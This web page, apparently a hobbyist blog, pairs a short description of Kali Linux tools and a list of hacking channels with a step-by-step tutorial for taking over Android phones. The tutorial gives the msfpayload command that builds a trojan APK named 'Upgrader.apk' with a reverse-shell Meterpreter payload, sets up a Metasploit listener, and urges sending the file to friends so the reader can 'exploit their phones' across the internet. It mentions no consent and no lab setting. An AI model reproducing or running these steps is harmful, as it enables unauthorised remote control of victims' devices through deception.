Kali Linux contains a large amount of penetration testing tools from various different niches of the security and forensics fields. This site aims to list them all and provide a quick reference to these tools. In addition, the versions of the tools can be tracked against their upstream sources. If you find any errors (typos, wrong URLs) please drop us an e-mail!
Penetration Testing Tools present in Kali Linux
Tools Listings
The Kali Linux penetration testing platform contains a vast array of tools and utilities, from information gathering to final reporting, that enable security and IT professionals to assess the security of their systems.
Metapackages
Metapackages give you the flexibility to install specific subsets of tools based on your particular needs. Kali Linux includes metapackages for wireless, web applications, forensics, software defined radio, and more.
Version Tracking
Maintaining and updating the large number of tools included in the Kali distribution is a on-going task. Our Version Tracking page allows you to compare the current upstream version with the version currently in Kali.
HOW TO BOOT KALILINUX IN USB
THE VIDEO HERE
CLICK TO WATCH
BEST WEBSITES FOR LERNING HACKING
1, NULL BYTE
BEST YOUTUBE CHANNEL TO LERN HACKING
1,TECH CHIPS
2,TECHNICAL SAGAR
3,TECH RAJ
4,SECHUB
HOW TO HACK MOBILE PHONE USING KALILINUX
Hello Hackers! Welcome to my 2nd Post: This is a tutorial explaining how to hack android phones with Kali. I can't see any tutorials explaining this Hack/Exploit, so, I made one. (Still ,you may already know about this)
Step 1: Fire-Up Kali:
Open a terminal, and make a Trojan .apk
You can do this by typing :
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)
Step 2: Open Another Terminal:
Open another terminal until the file is being produced.
Load metasploit console, by typing : msfconsole
Step 3: Set-Up a Listener:
After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 4: Exploit!
At last type: exploit to start the listener.
Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
Keep coming for more! Some post modules that work for windows might not work in android For Eg: run killav, persistence (persistent backdoor) etc.
Thank You!